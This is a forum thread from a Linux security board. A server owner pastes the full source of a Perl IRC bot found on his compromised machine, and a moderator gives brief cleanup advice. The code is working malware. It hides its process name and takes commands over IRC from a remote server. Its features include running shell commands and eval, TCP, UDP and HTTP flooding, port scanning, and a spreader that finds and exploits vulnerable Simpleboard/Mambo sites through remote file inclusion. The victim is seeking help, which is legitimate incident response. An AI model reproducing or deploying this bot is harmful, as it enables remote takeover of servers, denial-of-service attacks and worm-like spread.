LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 07-12-2006, 04:58 PM   #1
stefaandk
Member
 
Registered: Jun 2005
Distribution: Centos
Posts: 215

Rep: Reputation: 30
Server being exploited


Hi,

One of my servers is having tons of ps -x processes listed, looking into them clearly shows a hack that looks like r0nin which opens all log files.

But my /tmp dir is noexec. There was also a file in the /tmp dir that looked like this:

Code:


# more bots.txt 
#!/usr/bin/perl
# this spreader is coded by xdh
# #datentechnik at quakenet.org
# only for testing...

my @nickname = ("index.php?page=",
        "heaps of names were listed in alphabetic order (did not paste em",

my $nick = $nickname[rand scalar @nickname];

my $ircname = $nickname[rand scalar @nickname];


my $processo = 'ps -x';

system("");


# funny world...

my $linas_max='4';
my $sleep='5';
my @adms=("sorin","alef","mauroni");
my @hostauth=("Sorin.users.super-chat.org","realmadrid.pl");
my @canais=("#arubia");
chop (my $realname = `uname -a`);
$servidor='oslo1.no.EU.Super-Chat.Org' unless $servidor;
my $porta='6667';
my $VERSAO = 'masta';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         }
       }
        }
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4;
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick|".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal ddosit");
       }
   }
}


sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000
","8080","8018");
             my (@aberta, %porta_banner);
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
             }
           }
           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
             my $itime = time;
             my ($cur_time);
             $cur_time = time - $itime;
             while ($3>$cur_time){
             $cur_time = time - $itime;
             &tcpflooder("$1","$2","$3");
             }
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
           }
           if ($funcarg =~ /^version/) {
                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
                }
           if ($funcarg =~ /^attack!\s+(\d+)\s+(.*)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[PHP-Nuke]\002 Scanning for unpatched mambo for ".$1." seconds.");
             srand;
             my $itime = time;
             my ($cur_time);
             my ($exploited);
             $boturl=$2;
             $cur_time = time - $itime;$exploited = 0;
                while($1>$cur_time){
                    $cur_time = time - $itime;
                    @urls=fetch();
                        foreach $url (@urls) {
                        $cur_time = time - $itime;
                        my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
                        $url =$path."/components/com_simpleboard/file_upload.php?sbp=$boturl?";
                        $page = http_query($url);
                        $exploited = $exploited + 1;
                    }
                }
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[PHP-Nuke]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
           }
           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
             my $itime = time;
             my ($cur_time);
             $cur_time = time - $itime;
             while ($2>$cur_time){
             $cur_time = time - $itime;
             my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
             close($socket);
             }
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
           }
           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$
dtime." seconds to ".$1.".");
           }
           exit;
       }
  }
}

sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   }
   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}

sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  }
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}

sub tcpflooder {
 my $itime = time;
 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}

sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $porta = 1; $porta <= 65000; $porta++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
       }
     }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(10)) * $n);

my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","e
c",
                "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl"
,"biz","int","pro","museum","coop",
                "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn"
,"bg","bf","bi",
                "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
                "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu"
,"in","id","ir",
                "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je"
,"jo","kz","ke",
                "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn"
,"ms","mz","mm",
                "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as"
,"sm","pm","vc",
                "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv"
,"ug","ua","uz",
                "vu","vn","ye","yu","cd","zm","zw","");
my @str;

foreach $dom  (@dominios)
{
        push (@str,"%22Simpleboard+Forum+Component+1.1.0+Stable%22%2Bsite%3A".$dom."%20");
}

    my $query="search.msn.com/results.aspx?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";
    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
        if ($1 !~ m/ search.msn.com|cache|translate/){
            push (@lst,$1);
        }
    }
    return (@lst);
}

sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
        local $SIG{ALRM} = sub { die "1";};
        alarm 10;
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
        print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
        my @r = <$sock>;
        $page="@r";
        alarm 0;
        close($sock);
    };
    return $page;

}

I'm no coder so not sure what it does, obviously nothing good. All the dodgy stuff is owned b apache so must be some vulnerable site somewhere but how to keep it out?

Thanks
 
Old 07-12-2006, 05:23 PM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600
Bot stuff. Probably entry through stale or unprotected PHP-based app.
Kill Apache, kill child processes. Kick anything that doesn't belong.
Stop all services you don't need now except sshd if the box is remote.
Raise firewall to only allow traffic from/to your IP (or range if dynamic).
We'll handle assessment and mop up when you have done this.

Last edited by unSpawn; 07-12-2006 at 05:26 PM.
 
Old 07-12-2006, 05:31 PM   #3
stefaandk
Member
 
Registered: Jun 2005
Distribution: Centos
Posts: 215

Original Poster
Rep: Reputation: 30
Is there any quick way to kill apache processes, I stopped httpd but I have got tons of apache processes open.

I tried killall apache but that doesn't work. Normall I just do a kill for one PID.


Thanks
 
Old 07-12-2006, 05:44 PM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600
If they share the parent PID (PPID: ps ax -eo ppid,args --sort=ppid) you can "pkill -KILL -P $PPID"
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Fedora i686/2.4.27-0.3um - Server hostname reverts to original upon server reboot foxhosting Linux - Newbie 2 02-25-2006 03:39 AM
How the DNS-server is connected to work of a web-server and a mail-server? ukrainet Linux - Newbie 2 01-10-2005 09:18 PM
can we configure a Linux server with mail server,file server and web server kumarx Linux - Newbie 5 09-09-2004 06:21 AM
Unable to access my ssh server and ftp server from the Internet, but smtp works foxone Linux - Networking 1 05-28-2004 05:17 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 12:56 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration